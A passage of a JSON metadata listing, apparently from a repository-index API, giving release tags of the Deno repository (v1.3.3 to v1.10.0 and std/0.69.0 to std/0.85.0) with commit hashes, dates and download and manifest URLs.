ha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1